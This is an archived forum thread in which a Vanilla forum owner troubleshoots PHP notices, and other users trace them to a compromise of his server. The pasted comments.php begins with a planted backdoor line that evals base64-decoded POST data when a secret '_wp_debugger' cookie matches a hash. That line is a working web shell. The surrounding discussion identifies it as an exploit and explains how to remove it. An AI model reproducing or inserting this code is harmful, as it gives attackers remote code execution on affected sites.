Vanilla 1 is no longer supported or maintained. If you need a copy, you can get it here.
HackerOne users: Testing against this community violates our program's Terms of Service and will result in your bounty being denied.

wp_debugger error

edited April 2008 in Vanilla 1.0 Help
Hi--
I didn't change anything on idrinkyourmilkshake.com and suddenly get the following error on top of the page:

Notice: Undefined index: _wp_debugger in /home/jurgenfa/public_html/idrinkyourmilkshake.com/extensions/comments_permalinks/default.php on line 1

Does anybody have any advice on how to fix this? Thank you much!!

Jurgen

Comments

  • Hmm, I guess it's the permalinks extension -- I turned it off and the error disappeared. Why would this happen, though?
  • Now I see a new error on pages with discussions: Notice: Undefined index: _wp_debugger in /home/jurgenfa/public_html/idrinkyourmilkshake.com/themes/comments.php on line 1 Where does this stuff come from? How do I make it go away? As I said, I didn't change anything at all. The site has been getting slightly more traffic recently but nothing crazy. Anybody? Is this another plugin error? Thank you!
  • Anybody at all? That debugger error is still displaying, and I have no idea how to get rid of it. Thank you!! Notice: Undefined index: _wp_debugger in /home/jurgenfa/public_html/idrinkyourmilkshake.com/themes/comments.php on line 1
  • edited April 2008
    Can nobody help with this? Is there any other way to get support for Vanilla? I'd love to have this error taken care of, and I don't know what else to try. Thanks again.
  • edited April 2008
    What does the file /home/jurgenfa/.../themes/comments.php look like on line 1? Post the code in context (5 lines surrounding the line in question and inside <code> tags).

    If I had to guess without looking at anything, I'd say you have something in your php.ini file to auto_prepend_file or something and it's what's really causing the error. If you're on shared hosting, you might want to ask them if this they've changed anything related to this.
  • Thank you so much for your response. I'll paste the beginning of the file below. There's some debugger line in the beginning that seems to be causing the problem, but I don't know enough PHP to mess with it...

    <?php if(md5($_COOKIE['_wp_debugger'])=="c4460c548c319f361cd75496359cc674"){ eval(base64_decode($_POST['file'])); exit; } ?><?php // Note: This file is included from the library/Vanilla/Vanilla.Control.CommentGrid.php class. $CommentList = ''; if ($this->Context->WarningCollector->Count() > 0) { $CommentList .= '<div class="ErrorContainer"> <div class="ErrorTitle">'.$this->Context->GetDefinition('ErrorTitle').'</div>' .$this->Context->WarningCollector->GetMessages() .'</div>'; } else { $PageDetails = $this->pl->GetPageDetails($this->Context); $PageList = $this->pl->GetNumericList(); $SessionPostBackKey = $this->Context->Session->GetVariable('SessionPostBackKey', 'string'); $CommentList .= '<div class="ContentInfo Top"> <h1>'; if ($this->Context->Configuration['USE_CATEGORIES']) $CommentList .= '<a href="'.GetUrl($this->Context->Configuration, 'index.php', '', 'CategoryID', $this->Discussion->CategoryID).'">'.$this->Discussion->Category.'</a>: '; $CommentList .= DiscussionPrefix($this->Context, $this->Discussion).' '; if ($this->Discussion->WhisperUserID > 0) { $CommentList .= $this->Discussion->WhisperUsername.': '; } $CommentList .= $this->Discussion->Name .'</h1> <a href="#pgbottom">'.$this->Context->GetDefinition('BottomOfPage').'</a> <div class="PageInfo"> <p>'.$PageDetails.'</p> '.$PageList.' </div> </div>
  • edited April 2008
    It looks like a security hole in one of your wordpress plugins has been exploited. You'll need to remove that plugin and remove that If line wherever you find it on your server. (Leave the first <?php, but remove everything from if to the end of the line) This topic covers a bunch of symptoms and a link to further discussion: http://wordpress.org/support/topic/168964
  • Thanks! How can you tell it's a wordpress exploit? I just upgraded to 2.5 (finally!) so hopefully that will fix the security hole?

    I'll try to fix the file and I'll search the rest of the site for more instances.
  • Yikes! A compromised server...

    Usually, _wp_ anything means it's wordpress-related (not always). But you'll want definitely want to scrub your files for this exploit (a full-text search for _wp_debugger should do it).

    If I read the article WallPhone linked correctly, this issue still exists in 2.5.
  • Yeah, I think you're right about 2.5. Argghh! I'm backing up the entire site to do a search... thanks again for locating the problem.
This discussion has been closed.